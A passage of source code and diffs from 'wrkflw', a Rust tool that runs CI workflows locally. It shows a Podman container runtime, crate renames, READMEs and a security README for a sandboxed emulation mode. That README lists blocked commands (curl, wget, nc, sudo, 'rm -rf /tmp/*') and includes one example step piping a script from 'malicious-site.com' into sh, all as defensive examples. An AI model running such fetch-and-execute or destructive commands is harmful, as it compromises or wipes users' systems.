            Ok(Err(e)) => wrkflw_logging::warning(&format!(
                "Error removing container {}: {}",
                container_id, e
            )),
            Err(_) => {
                wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
            }
        }

        // Always untrack the container whether or not we succeeded to avoid future cleanup attempts
        untrack_container(&container_id);
    }

    Ok(())
}

#[async_trait]
impl ContainerRuntime for PodmanRuntime {
    async fn run_container(
        &self,
        image: &str,
        cmd: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
        volumes: &[(&Path, &Path)],
    ) -> Result<ContainerOutput, ContainerError> {
        // Print detailed debugging info
        wrkflw_logging::info(&format!("Podman: Running container with image: {}", image));

        let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout

        // Run the entire container operation with a timeout
        match tokio::time::timeout(
            timeout_duration,
            self.run_container_inner(image, cmd, env_vars, working_dir, volumes),
        )
        .await
        {
            Ok(result) => result,
            Err(_) => {
                wrkflw_logging::error("Podman operation timed out after 360 seconds");
                Err(ContainerError::ContainerExecution(
                    "Operation timed out".to_string(),
                ))
            }
        }
    }

    async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
        // Add a timeout for pull operations
        let timeout_duration = std::time::Duration::from_secs(30);

        match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
            Ok(result) => result,
            Err(_) => {
                wrkflw_logging::warning(&format!(
                    "Pull of image {} timed out, continuing with existing image",
                    image
                ));
                // Return success to allow continuing with existing image
                Ok(())
            }
        }
    }

    async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
        // Add a timeout for build operations
        let timeout_duration = std::time::Duration::from_secs(120); // 2 minutes timeout for builds

        match tokio::time::timeout(timeout_duration, self.build_image_inner(dockerfile, tag)).await
        {
            Ok(result) => result,
            Err(_) => {
                wrkflw_logging::error(&format!(
                    "Building image {} timed out after 120 seconds",
                    tag
                ));
                Err(ContainerError::ImageBuild(
                    "Operation timed out".to_string(),
                ))
            }
        }
    }

    async fn prepare_language_environment(
        &self,
        language: &str,
        version: Option<&str>,
        additional_packages: Option<Vec<String>>,
    ) -> Result<String, ContainerError> {
        // Check if we already have a customized image for this language and version
        let key = format!("{}-{}", language, version.unwrap_or("latest"));
        if let Some(customized_image) = Self::get_language_specific_image("", language, version) {
            return Ok(customized_image);
        }

        // Create a temporary Dockerfile for customization
        let temp_dir = tempfile::tempdir().map_err(|e| {
            ContainerError::ContainerStart(format!("Failed to create temp directory: {}", e))
        })?;

        let dockerfile_path = temp_dir.path().join("Dockerfile");
        let mut dockerfile_content = String::new();

        // Add language-specific setup based on the language
        match language {
            "python" => {
                let base_image =
                    version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v));
                dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
                dockerfile_content.push_str(
                    "RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
                );
                dockerfile_content.push_str(" build-essential \\\n");
                dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");

                if let Some(packages) = additional_packages {
                    for package in packages {
                        dockerfile_content.push_str(&format!("RUN pip install {}\n", package));
                    }
                }
            }
            "node" => {
                let base_image =
                    version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v));
                dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
                dockerfile_content.push_str(
                    "RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
                );
                dockerfile_content.push_str(" build-essential \\\n");
                dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");

                if let Some(packages) = additional_packages {
                    for package in packages {
                        dockerfile_content.push_str(&format!("RUN npm install -g {}\n", package));
                    }
                }
            }
            "java" => {
                let base_image = version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
                    format!("eclipse-temurin:{}", v)
                });
                dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
                dockerfile_content.push_str(
                    "RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
                );
                dockerfile_content.push_str(" maven \\\n");
                dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
            }
            "go" => {
                let base_image =
                    version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v));
                dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
                dockerfile_content.push_str(
                    "RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
                );
                dockerfile_content.push_str(" git \\\n");
                dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");

                if let Some(packages) = additional_packages {
                    for package in packages {
                        dockerfile_content.push_str(&format!("RUN go install {}\n", package));
                    }
                }
            }
            "dotnet" => {
                let base_image = version
                    .map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
                        format!("mcr.microsoft.com/dotnet/sdk:{}", v)
                    });
                dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));

                if let Some(packages) = additional_packages {
                    for package in packages {
                        dockerfile_content
                            .push_str(&format!("RUN dotnet tool install -g {}\n", package));
                    }
                }
            }
            "rust" => {
                let base_image =
                    version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v));
                dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
                dockerfile_content.push_str(
                    "RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
                );
                dockerfile_content.push_str(" build-essential \\\n");
                dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");

                if let Some(packages) = additional_packages {
                    for package in packages {
                        dockerfile_content.push_str(&format!("RUN cargo install {}\n", package));
                    }
                }
            }
            _ => {
                return Err(ContainerError::ContainerStart(format!(
                    "Unsupported language: {}",
                    language
                )));
            }
        }

        // Write the Dockerfile
        std::fs::write(&dockerfile_path, dockerfile_content).map_err(|e| {
            ContainerError::ContainerStart(format!("Failed to write Dockerfile: {}", e))
        })?;

        // Build the customized image
        let image_tag = format!("wrkflw-{}-{}", language, version.unwrap_or("latest"));
        self.build_image(&dockerfile_path, &image_tag).await?;

        // Store the customized image
        Self::set_language_specific_image("", language, version, &image_tag);

        Ok(image_tag)
    }
}

// Implementation of internal methods
impl PodmanRuntime {
    async fn run_container_inner(
        &self,
        image: &str,
        cmd: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
        volumes: &[(&Path, &Path)],
    ) -> Result<ContainerOutput, ContainerError> {
        wrkflw_logging::debug(&format!("Running command in Podman: {:?}", cmd));
        wrkflw_logging::debug(&format!("Environment: {:?}", env_vars));
        wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));

        // Generate a unique container name
        let container_name = format!("wrkflw-{}", uuid::Uuid::new_v4());

        // Build the podman run command and store temporary strings
        let working_dir_str = working_dir.to_string_lossy().to_string();
        let mut env_strings = Vec::new();
        let mut volume_strings = Vec::new();

        // Prepare environment variable strings
        for (key, value) in env_vars {
            env_strings.push(format!("{}={}", key, value));
        }

        // Prepare volume mount strings
        for (host_path, container_path) in volumes {
            volume_strings.push(format!(
                "{}:{}",
                host_path.to_string_lossy(),
                container_path.to_string_lossy()
            ));
        }

        let mut args = vec!["run", "--name", &container_name, "-w", &working_dir_str];

        // Only use --rm if we don't want to preserve containers on failure
        // When preserve_containers_on_failure is true, we skip --rm so failed containers remain
        if !self.preserve_containers_on_failure {
            args.insert(1, "--rm"); // Insert after "run"
        }

        // Add environment variables
        for env_string in &env_strings {
            args.push("-e");
            args.push(env_string);
        }

        // Add volume mounts
        for volume_string in &volume_strings {
            args.push("-v");
            args.push(volume_string);
        }

        // Add the image
        args.push(image);

        // Add the command
        args.extend(cmd);

        // Track the container (even though we use --rm, track it for consistency)
        track_container(&container_name);

        // Execute the command
        let result = self.execute_podman_command(&args, None).await;

        // Handle container cleanup based on result and settings
        match &result {
            Ok(output) => {
                if output.exit_code == 0 {
                    // Success - always clean up successful containers
                    if self.preserve_containers_on_failure {
                        // We didn't use --rm, so manually remove successful container
                        let cleanup_result = tokio::time::timeout(
                            std::time::Duration::from_millis(1000),
                            Command::new("podman")
                                .args(["rm", &container_name])
                                .stdout(Stdio::null())
                                .stderr(Stdio::null())
                                .output(),
                        )
                        .await;

                        match cleanup_result {
                            Ok(Ok(cleanup_output)) => {
                                if !cleanup_output.status.success() {
                                    wrkflw_logging::debug(&format!(
                                        "Failed to remove successful container {}",
                                        container_name
                                    ));
                                }
                            }
                            _ => wrkflw_logging::debug(&format!(
                                "Timeout removing successful container {}",
                                container_name
                            )),
                        }
                    }
                    // If not preserving, container was auto-removed with --rm
                    untrack_container(&container_name);
                } else {
                    // Failed container
                    if self.preserve_containers_on_failure {
                        // Failed and we want to preserve - don't clean up but untrack from auto-cleanup
                        wrkflw_logging::info(&format!(
                            "Preserving failed container {} for debugging (exit code: {}). Use 'podman exec -it {} bash' to inspect.",
                            container_name, output.exit_code, container_name
                        ));
                        untrack_container(&container_name);
                    } else {
                        // Failed but we don't want to preserve - container was auto-removed with --rm
                        untrack_container(&container_name);
                    }
                }
            }
            Err(_) => {
                // Command failed to execute properly - clean up if container exists and not preserving
                if !self.preserve_containers_on_failure {
                    // Container was created with --rm, so it should be auto-removed
                    untrack_container(&container_name);
                } else {
                    // Container was created without --rm, try to clean it up since execution failed
                    let cleanup_result = tokio::time::timeout(
                        std::time::Duration::from_millis(1000),
                        Command::new("podman")
                            .args(["rm", "-f", &container_name])
                            .stdout(Stdio::null())
                            .stderr(Stdio::null())
                            .output(),
                    )
                    .await;

                    match cleanup_result {
                        Ok(Ok(_)) => wrkflw_logging::debug(&format!(
                            "Cleaned up failed execution container {}",
                            container_name
                        )),
                        _ => wrkflw_logging::debug(&format!(
                            "Failed to clean up execution failure container {}",
                            container_name
                        )),
                    }
                    untrack_container(&container_name);
                }
            }
        }

        match &result {
            Ok(output) => {
                if output.exit_code != 0 {
                    wrkflw_logging::info(&format!(
                        "Podman command failed with exit code: {}",
                        output.exit_code
                    ));
                    wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
                    wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
                    wrkflw_logging::debug(&format!("STDERR: {}", output.stderr));
                }
            }
            Err(e) => {
                wrkflw_logging::error(&format!("Podman execution error: {}", e));
            }
        }

        result
    }

    async fn pull_image_inner(&self, image: &str) -> Result<(), ContainerError> {
        let args = vec!["pull", image];
        let output = self.execute_podman_command(&args, None).await?;

        if output.exit_code != 0 {
            return Err(ContainerError::ImagePull(format!(
                "Failed to pull image {}: {}",
                image, output.stderr
            )));
        }

        Ok(())
    }

    async fn build_image_inner(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
        let context_dir = dockerfile.parent().unwrap_or(Path::new("."));
        let dockerfile_str = dockerfile.to_string_lossy().to_string();
        let context_dir_str = context_dir.to_string_lossy().to_string();
        let args = vec!["build", "-f", &dockerfile_str, "-t", tag, &context_dir_str];

        let output = self.execute_podman_command(&args, None).await?;

        if output.exit_code != 0 {
            return Err(ContainerError::ImageBuild(format!(
                "Failed to build image {}: {}",
                tag, output.stderr
            )));
        }

        Ok(())
    }
}

// Public accessor functions for testing
#[cfg(test)]
pub fn get_tracked_containers() -> Vec<String> {
    if let Ok(containers) = RUNNING_CONTAINERS.lock() {
        containers.clone()
    } else {
        vec![]
    }
}
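For orientation, here is a rough sketch of how the new runtime is driven through the `ContainerRuntime` trait. It is a usage sketch only: `run_container` and `new_with_config` are as defined in the file above, the image and paths are placeholders, and it assumes `PodmanRuntime` is in scope (it lives in `crates/executor/src/podman.rs`) and that `ContainerError` converts into `Box<dyn Error>`:

```rust
use std::path::Path;
use wrkflw_runtime::container::ContainerRuntime;

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    // Preserve failed containers so they can be inspected with `podman exec`
    let runtime = PodmanRuntime::new_with_config(true)?;

    let host = Path::new("/tmp/wrkflw-demo"); // placeholder host dir
    let workdir = Path::new("/workspace");    // mount point inside the container
    let output = runtime
        .run_container(
            "docker.io/library/alpine:latest",
            &["sh", "-c", "echo hello from podman"],
            &[("CI", "true")],
            workdir,
            &[(host, workdir)],
        )
        .await?;

    println!("exit={} stdout={}", output.exit_code, output.stdout);
    Ok(())
}
```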
@@ -1,13 +1,18 @@
 [package]
-name = "github"
+name = "wrkflw-github"
 version.workspace = true
 edition.workspace = true
-description = "github functionality for wrkflw"
+description = "GitHub API integration for wrkflw workflow execution engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
-# Add other crate dependencies as needed
-models = { path = "../models" }
+# Internal crates
+wrkflw-models.workspace = true

+# External dependencies from workspace
 serde.workspace = true
23
crates/github/README.md
Normal file
@@ -0,0 +1,23 @@
## wrkflw-github

GitHub integration helpers used by `wrkflw` to list/trigger workflows.

- **List workflows** in `.github/workflows`
- **Trigger workflow_dispatch** events over the GitHub API

### Example

```rust
use wrkflw_github::{get_repo_info, trigger_workflow};

# tokio_test::block_on(async {
let info = get_repo_info()?;
println!("{}/{} (default branch: {})", info.owner, info.repo, info.default_branch);

// Requires GITHUB_TOKEN in env
trigger_workflow("ci", Some("main"), None).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

Notes: set `GITHUB_TOKEN` with the `workflow` scope; only public repos are supported out-of-the-box.
@@ -1,13 +1,18 @@
 [package]
-name = "gitlab"
+name = "wrkflw-gitlab"
 version.workspace = true
 edition.workspace = true
-description = "gitlab functionality for wrkflw"
+description = "GitLab API integration for wrkflw workflow execution engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 # Internal crates
-models = { path = "../models" }
+wrkflw-models.workspace = true

 # External dependencies
 lazy_static.workspace = true
23
crates/gitlab/README.md
Normal file
@@ -0,0 +1,23 @@
## wrkflw-gitlab

GitLab integration helpers used by `wrkflw` to trigger pipelines.

- Reads repo info from local git remote
- Triggers pipelines via GitLab API

### Example

```rust
use wrkflw_gitlab::{get_repo_info, trigger_pipeline};

# tokio_test::block_on(async {
let info = get_repo_info()?;
println!("{}/{} (default branch: {})", info.namespace, info.project, info.default_branch);

// Requires GITLAB_TOKEN in env (api scope)
trigger_pipeline(Some("main"), None).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

Notes: looks for `.gitlab-ci.yml` in the repo root when listing pipelines.
@@ -1,13 +1,18 @@
 [package]
-name = "logging"
+name = "wrkflw-logging"
 version.workspace = true
 edition.workspace = true
-description = "logging functionality for wrkflw"
+description = "Logging functionality for wrkflw workflow execution engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 # Internal crates
-models = { path = "../models" }
+wrkflw-models.workspace = true

 # External dependencies
 chrono.workspace = true
22
crates/logging/README.md
Normal file
@@ -0,0 +1,22 @@
## wrkflw-logging

Lightweight in-memory logging with simple levels for TUI/CLI output.

- Thread-safe, timestamped messages
- Level filtering (Debug/Info/Warning/Error)
- Pluggable into UI for live log views

### Example

```rust
use wrkflw_logging::{info, warning, error, LogLevel, set_log_level, get_logs};

set_log_level(LogLevel::Info);
info("starting");
warning("be careful");
error("boom");

for line in get_logs() {
    println!("{}", line);
}
```
@@ -1,13 +1,18 @@
 [package]
-name = "matrix"
+name = "wrkflw-matrix"
 version.workspace = true
 edition.workspace = true
-description = "matrix functionality for wrkflw"
+description = "Matrix job parallelization for wrkflw workflow execution engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 # Internal crates
-models = { path = "../models" }
+wrkflw-models.workspace = true

 # External dependencies
 indexmap.workspace = true
20
crates/matrix/README.md
Normal file
@@ -0,0 +1,20 @@
## wrkflw-matrix

Matrix expansion utilities used to compute all job combinations and format labels.

- Supports `include`, `exclude`, `max-parallel`, and `fail-fast`
- Provides display helpers for UI/CLI

### Example

```rust
use wrkflw_matrix::{MatrixConfig, expand_matrix};
use serde_yaml::Value;
use std::collections::HashMap;

let mut cfg = MatrixConfig::default();
cfg.parameters.insert("os".into(), Value::from(vec!["ubuntu", "alpine"]));

let combos = expand_matrix(&cfg).expect("expand");
assert!(!combos.is_empty());
```
@@ -1,12 +1,17 @@
 [package]
-name = "models"
+name = "wrkflw-models"
 version.workspace = true
 edition.workspace = true
-description = "Data models for wrkflw"
+description = "Data models and structures for wrkflw workflow execution engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 serde.workspace = true
 serde_yaml.workspace = true
 serde_json.workspace = true
 thiserror.workspace = true
16
crates/models/README.md
Normal file
@@ -0,0 +1,16 @@
## wrkflw-models

Common data structures shared across crates.

- `ValidationResult` for structural/semantic checks
- GitLab pipeline models (serde types)

### Example

```rust
use wrkflw_models::ValidationResult;

let mut res = ValidationResult::new();
res.add_issue("missing jobs".into());
assert!(!res.is_valid);
```
@@ -1,14 +1,19 @@
 [package]
-name = "parser"
+name = "wrkflw-parser"
 version.workspace = true
 edition.workspace = true
-description = "Parser functionality for wrkflw"
+description = "Workflow parsing functionality for wrkflw execution engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 # Internal crates
-models = { path = "../models" }
-matrix = { path = "../matrix" }
+wrkflw-models.workspace = true
+wrkflw-matrix.workspace = true

 # External dependencies
 jsonschema.workspace = true
13
crates/parser/README.md
Normal file
@@ -0,0 +1,13 @@
## wrkflw-parser

Parsers and schema helpers for GitHub/GitLab workflow files.

- GitHub Actions workflow parsing and JSON Schema validation
- GitLab CI parsing helpers

### Example

```rust
// High-level crates (`wrkflw` and `wrkflw-executor`) wrap parser usage.
// Use those unless you are extending parsing behavior directly.
```
1711
crates/parser/src/github-workflow.json
Normal file
File diff suppressed because it is too large
3012
crates/parser/src/gitlab-ci.json
Normal file
File diff suppressed because it is too large
@@ -1,11 +1,11 @@
 use crate::schema::{SchemaType, SchemaValidator};
 use crate::workflow;
-use models::gitlab::Pipeline;
-use models::ValidationResult;
 use std::collections::HashMap;
 use std::fs;
 use std::path::Path;
 use thiserror::Error;
+use wrkflw_models::gitlab::Pipeline;
+use wrkflw_models::ValidationResult;

 #[derive(Error, Debug)]
 pub enum GitlabParserError {
@@ -130,7 +130,7 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi

     // Create a new job
     let mut job = workflow::Job {
-        runs_on: "ubuntu-latest".to_string(), // Default runner
+        runs_on: Some(vec!["ubuntu-latest".to_string()]), // Default runner
         needs: None,
         steps: Vec::new(),
         env: HashMap::new(),
@@ -139,6 +139,9 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
         if_condition: None,
         outputs: None,
         permissions: None,
+        uses: None,
+        with: None,
+        secrets: None,
     };

     // Add job-specific environment variables
@@ -204,8 +207,8 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
     for (i, service) in services.iter().enumerate() {
         let service_name = format!("service-{}", i);
         let service_image = match service {
-            models::gitlab::Service::Simple(name) => name.clone(),
-            models::gitlab::Service::Detailed { name, .. } => name.clone(),
+            wrkflw_models::gitlab::Service::Simple(name) => name.clone(),
+            wrkflw_models::gitlab::Service::Detailed { name, .. } => name.clone(),
         };

         let service = workflow::Service {
@@ -230,13 +233,13 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
 #[cfg(test)]
 mod tests {
     use super::*;
-    use std::path::PathBuf;
+    // use std::path::PathBuf; // unused
     use tempfile::NamedTempFile;

     #[test]
     fn test_parse_simple_pipeline() {
         // Create a temporary file with a simple GitLab CI/CD pipeline
-        let mut file = NamedTempFile::new().unwrap();
+        let file = NamedTempFile::new().unwrap();
         let content = r#"
stages:
  - build
@@ -257,7 +260,7 @@ test_job:
         fs::write(&file, content).unwrap();

         // Parse the pipeline
-        let pipeline = parse_pipeline(&file.path()).unwrap();
+        let pipeline = parse_pipeline(file.path()).unwrap();

         // Validate basic structure
         assert_eq!(pipeline.stages.as_ref().unwrap().len(), 2);
@@ -3,8 +3,8 @@ use serde_json::Value;
 use std::fs;
 use std::path::Path;

-const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("../../../schemas/github-workflow.json");
-const GITLAB_CI_SCHEMA: &str = include_str!("../../../schemas/gitlab-ci.json");
+const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("github-workflow.json");
+const GITLAB_CI_SCHEMA: &str = include_str!("gitlab-ci.json");

 #[derive(Debug, Clone, Copy)]
 pub enum SchemaType {
@@ -1,8 +1,8 @@
-use matrix::MatrixConfig;
 use serde::{Deserialize, Deserializer, Serialize};
 use std::collections::HashMap;
 use std::fs;
 use std::path::Path;
+use wrkflw_matrix::MatrixConfig;

 use super::schema::SchemaValidator;

@@ -26,6 +26,26 @@ where
     }
 }

+// Custom deserializer for runs-on field that handles both string and array formats
+fn deserialize_runs_on<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
+where
+    D: Deserializer<'de>,
+{
+    #[derive(Deserialize)]
+    #[serde(untagged)]
+    enum StringOrVec {
+        String(String),
+        Vec(Vec<String>),
+    }
+
+    let value = Option::<StringOrVec>::deserialize(deserializer)?;
+    match value {
+        Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
+        Some(StringOrVec::Vec(v)) => Ok(Some(v)),
+        None => Ok(None),
+    }
+}
+
 #[derive(Debug, Deserialize, Serialize)]
 pub struct WorkflowDefinition {
     pub name: String,
@@ -38,10 +58,11 @@ pub struct WorkflowDefinition {

 #[derive(Debug, Deserialize, Serialize)]
 pub struct Job {
-    #[serde(rename = "runs-on")]
-    pub runs_on: String,
+    #[serde(rename = "runs-on", default, deserialize_with = "deserialize_runs_on")]
+    pub runs_on: Option<Vec<String>>,
     #[serde(default, deserialize_with = "deserialize_needs")]
     pub needs: Option<Vec<String>>,
     #[serde(default)]
     pub steps: Vec<Step>,
     #[serde(default)]
     pub env: HashMap<String, String>,
@@ -55,6 +76,13 @@ pub struct Job {
     pub outputs: Option<HashMap<String, String>>,
     #[serde(default)]
     pub permissions: Option<HashMap<String, String>>,
+    // Reusable workflow (job-level 'uses') support
+    #[serde(default)]
+    pub uses: Option<String>,
+    #[serde(default)]
+    pub with: Option<HashMap<String, String>>,
+    #[serde(default)]
+    pub secrets: Option<serde_yaml::Value>,
 }

 #[derive(Debug, Deserialize, Serialize)]
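With this change, both accepted YAML shapes for `runs-on` land in the same `Option<Vec<String>>`. A self-contained sketch of that behavior follows; `JobStub` is a stand-in for illustration, not the crate's `Job`, and the helper is copied from the hunk above:

```rust
use serde::{Deserialize, Deserializer};

// Stand-in struct; the real `Job` has many more fields.
#[derive(Debug, Deserialize)]
struct JobStub {
    #[serde(rename = "runs-on", default, deserialize_with = "deserialize_runs_on")]
    runs_on: Option<Vec<String>>,
}

// Same untagged-enum trick as in the diff: try a scalar first, then a list.
fn deserialize_runs_on<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
where
    D: Deserializer<'de>,
{
    #[derive(Deserialize)]
    #[serde(untagged)]
    enum StringOrVec {
        String(String),
        Vec(Vec<String>),
    }

    Ok(match Option::<StringOrVec>::deserialize(deserializer)? {
        Some(StringOrVec::String(s)) => Some(vec![s]),
        Some(StringOrVec::Vec(v)) => Some(v),
        None => None,
    })
}

fn main() {
    // Scalar form normalizes to a one-element vector
    let scalar: JobStub = serde_yaml::from_str("runs-on: ubuntu-latest").unwrap();
    assert_eq!(scalar.runs_on, Some(vec!["ubuntu-latest".to_string()]));

    // List form passes through unchanged
    let list: JobStub = serde_yaml::from_str("runs-on: [self-hosted, linux]").unwrap();
    assert_eq!(list.runs_on.unwrap().len(), 2);
}
```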
@@ -1,22 +1,30 @@
 [package]
-name = "runtime"
+name = "wrkflw-runtime"
 version.workspace = true
 edition.workspace = true
-description = "Runtime environment for wrkflw"
+description = "Runtime execution environment for wrkflw workflow engine"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 # Internal crates
-models = { path = "../models" }
-logging = { path = "../logging", version = "0.4.0" }
+wrkflw-models.workspace = true
+wrkflw-logging.workspace = true

 # External dependencies
 async-trait.workspace = true
-once_cell = "1.19"
+once_cell.workspace = true
 serde.workspace = true
 serde_yaml.workspace = true
-tempfile = "3.9"
+tempfile.workspace = true
 tokio.workspace = true
-futures = "0.3"
-utils = { path = "../utils", version = "0.4.0" }
-which = "4.4"
+futures.workspace = true
+ignore = "0.4"
+wrkflw-utils.workspace = true
+which.workspace = true
 regex.workspace = true
 thiserror.workspace = true
13
crates/runtime/README.md
Normal file
@@ -0,0 +1,13 @@
## wrkflw-runtime

Runtime abstractions for executing steps in containers or emulation.

- Container management primitives used by the executor
- Emulation mode helpers (run on host without containers)

### Example

```rust
// This crate is primarily consumed by `wrkflw-executor`.
// Prefer using the executor API instead of calling runtime directly.
```
258
crates/runtime/README_SECURITY.md
Normal file
@@ -0,0 +1,258 @@
# Security Features in wrkflw Runtime

This document describes the security features implemented in the wrkflw runtime, particularly the sandboxing capabilities for emulation mode.

## Overview

The wrkflw runtime provides multiple execution modes with varying levels of security:

1. **Docker Mode** - Uses Docker containers for isolation (recommended for production)
2. **Podman Mode** - Uses Podman containers for isolation with rootless support
3. **Secure Emulation Mode** - 🔒 **NEW**: Sandboxed execution on the host system
4. **Emulation Mode** - ⚠️ **UNSAFE**: Direct execution on the host system (deprecated)

## Security Modes

### 🔒 Secure Emulation Mode (Recommended for Local Development)

The secure emulation mode provides comprehensive sandboxing to protect your system from potentially harmful commands while still allowing legitimate workflow operations.

#### Features

- **Command Validation**: Blocks dangerous commands like `rm -rf /`, `dd`, `sudo`, etc.
- **Pattern Detection**: Uses regex patterns to detect dangerous command combinations
- **Resource Limits**: Enforces CPU, memory, and execution time limits
- **Filesystem Isolation**: Restricts file access to allowed paths only
- **Environment Sanitization**: Filters dangerous environment variables
- **Process Monitoring**: Tracks and limits spawned processes

#### Usage

```bash
# Use secure emulation mode (recommended)
wrkflw run --runtime secure-emulation .github/workflows/build.yml

# Or via TUI
wrkflw tui --runtime secure-emulation
```

#### Command Whitelist/Blacklist

**Allowed Commands (Safe):**
- Basic utilities: `echo`, `cat`, `ls`, `grep`, `sed`, `awk`
- Development tools: `cargo`, `npm`, `python`, `git`, `node`
- Build tools: `make`, `cmake`, `javac`, `dotnet`

**Blocked Commands (Dangerous):**
- System modification: `rm`, `dd`, `mkfs`, `mount`, `sudo`
- Network tools: `wget`, `curl`, `ssh`, `nc`
- Process control: `kill`, `killall`, `systemctl`
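A rough sketch of what this kind of allow/deny check can look like is shown below. The gate function itself is illustrative, not the crate's actual implementation; the strict/whitelist semantics follow the `strict_mode` flag of the `SandboxConfig` shown in the next section:

```rust
use std::collections::HashSet;

/// Illustrative gate, not the crate's implementation: deny-list first,
/// then allow-list when strict (whitelist-only) mode is on.
fn is_command_allowed(
    run_line: &str,
    allowed: &HashSet<String>,
    blocked: &HashSet<String>,
    strict_mode: bool,
) -> bool {
    // Treat the first whitespace-separated token as the program name
    let program = run_line.split_whitespace().next().unwrap_or("");
    if blocked.contains(program) {
        return false;
    }
    !strict_mode || allowed.contains(program)
}
```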
#### Resource Limits

```rust
// Default configuration
SandboxConfig {
    max_execution_time: Duration::from_secs(300), // 5 minutes
    max_memory_mb: 512,                           // 512 MB
    max_cpu_percent: 80,                          // 80% CPU
    max_processes: 10,                            // Max 10 processes
    allow_network: false,                         // No network access
    strict_mode: true,                            // Whitelist-only mode
}
```

### ⚠️ Legacy Emulation Mode (Unsafe)

The original emulation mode executes commands directly on the host system without any sandboxing. **This mode will be deprecated and should only be used for trusted workflows.**

```bash
# Legacy unsafe mode (not recommended)
wrkflw run --runtime emulation .github/workflows/build.yml
```

## Example: Blocked vs Allowed Commands

### ❌ Blocked Commands

```yaml
# This workflow will be blocked in secure emulation mode
steps:
  - name: Dangerous command
    run: rm -rf /tmp/* # BLOCKED: Dangerous file deletion

  - name: System modification
    run: sudo apt-get install package # BLOCKED: sudo usage

  - name: Network access
    run: wget https://malicious-site.com/script.sh | sh # BLOCKED: wget + shell execution
```

### ✅ Allowed Commands

```yaml
# This workflow will run successfully in secure emulation mode
steps:
  - name: Build project
    run: cargo build --release # ALLOWED: Development tool

  - name: Run tests
    run: cargo test # ALLOWED: Testing

  - name: List files
    run: ls -la target/ # ALLOWED: Safe file listing

  - name: Format code
    run: cargo fmt --check # ALLOWED: Code formatting
```

## Security Warnings and Messages

When dangerous commands are detected, wrkflw provides clear security messages:

```
🚫 SECURITY BLOCK: Command 'rm' is not allowed in secure emulation mode.
This command was blocked for security reasons.
If you need to run this command, please use Docker or Podman mode instead.
```

```
🚫 SECURITY BLOCK: Dangerous command pattern detected: 'rm -rf /'.
This command was blocked because it matches a known dangerous pattern.
Please review your workflow for potentially harmful commands.
```

## Configuration Examples

### Workflow-Friendly Configuration

```rust
use wrkflw_runtime::sandbox::create_workflow_sandbox_config;

let config = create_workflow_sandbox_config();
// - Allows network access for package downloads
// - Higher resource limits for CI/CD workloads
// - Less strict mode for development flexibility
```

### Strict Security Configuration

```rust
use wrkflw_runtime::sandbox::create_strict_sandbox_config;

let config = create_strict_sandbox_config();
// - No network access
// - Very limited command set
// - Low resource limits
// - Strict whitelist-only mode
```

### Custom Configuration
```rust
use wrkflw_runtime::sandbox::{SandboxConfig, Sandbox};
use std::collections::HashSet;
use std::path::PathBuf;
use std::time::Duration;

let mut config = SandboxConfig::default();

// Custom allowed commands
config.allowed_commands = ["echo", "ls", "cargo"]
    .iter()
    .map(|s| s.to_string())
